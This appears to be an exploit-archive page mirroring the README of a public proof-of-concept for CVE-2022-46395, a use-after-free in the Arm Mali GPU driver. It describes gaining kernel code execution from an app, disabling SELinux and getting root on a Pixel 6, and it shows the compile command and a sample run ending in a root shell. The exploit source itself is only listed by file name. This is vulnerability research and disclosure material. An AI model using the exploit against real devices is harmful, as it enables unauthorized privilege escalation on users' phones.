Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-46395 PoC — ARM Mali GPU 资源管理错误漏洞

Source
https://github.com/SmileTabLabo/CVE-2022-46395
Associated Vulnerability
Title:ARM Mali GPU 资源管理错误漏洞 (CVE-2022-46395)
Description:ARM Mali GPU是英国ARM公司的一款移动显示芯片组(GPUs)系列。和其他基于IP核心(IP cores)嵌入式技术的3D显示芯片一样,Mali显示芯片组没有提供特别用来驱动LCD显示器显示图像的显示控制器(类似于显卡),相反地,它是一个纯3D显示引擎,它将图像加载到缓存中,并且由专门负责图像显示处理的内置显示核心来显示这些图像。 ARM Mali GPU 存在安全漏洞,该漏洞源于非特权用户可以进行不正确的GPU处理操作来访问已释放的内存。
Readme
## Exploit for CVE-2022-46395

The write up can be found [here](https://github.blog/2023-05-25-rooting-with-root-cause-finding-a-variant-of-a-project-zero-bug). This is a bug in the Arm Mali kernel driver that I reported in November 2022. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.

The exploit is tested on the Google Pixel 6 with the Novmember 2022 and January 2023 patch. For reference, I used the following command to compile with clang in ndk-21:

```
android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o mali_user_buf
```

The exploit should be run a couple of minutes after boot and is likely to have to run for a few minutes to succeed. It is not uncommon to fail the race conditions hundreds of times, although failing the race condition does not have any ill effect and the exploit as a whole rare crashes. If successful, it should disable SELinux and gain root.

```
oriole:/ $ /data/local/tmp/mali_user_buf                                       
fingerprint: google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys
benchmark_time 357
failed after 100
failed after 200
failed after 300
benchmark_time 343
failed after 400
failed after 500
failed after 600
benchmark_time 337
failed after 700
failed after 800
failed after 900
benchmark_time 334
failed after 1000
failed after 1100
failed after 1200
benchmark_time 363
failed after 1300
finished reset: 190027720 fault: 135735849 772 err 0 read 3
found pgd at page 4
overwrite addr : 76f6100710 710
overwrite addr : 76f5f00710 710
overwrite addr : 76f6100710 710
overwrite addr : 76f5f00710 710
overwrite addr : 76f5d00710 710
overwrite addr : 76f5b00710 710
overwrite addr : 76f5d00710 710
overwrite addr : 76f5b00710 710
overwrite addr : 76f6100fd4 fd4
overwrite addr : 76f5f00fd4 fd4
overwrite addr : 76f6100fd4 fd4
overwrite addr : 76f5f00fd4 fd4
overwrite addr : 76f5d00fd4 fd4
overwrite addr : 76f5b00fd4 fd4
overwrite addr : 76f5d00fd4 fd4
overwrite addr : 76f5b00fd4 fd4
result 50
oriole:/ # 
```
File Snapshot

 [4.0K]  /data/pocs/4f138f116e558a9a209928b802d3be4f5e106d7c
├── [ 241]  log_utils.h
├── [ 50K]  mali_base_jm_kernel.h
├── [ 32K]  mali.h
├── [ 22K]  mali_user_buf.c
├── [1.8K]  mempool_utils.c
├── [ 461]  mempool_utils.h
├── [5.0K]  mem_write.c
├── [ 873]  mem_write.h
├── [ 11K]  midgard.h
├── [5.2K]  offsets.h
└── [2.1K]  README.md

0 directories, 11 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.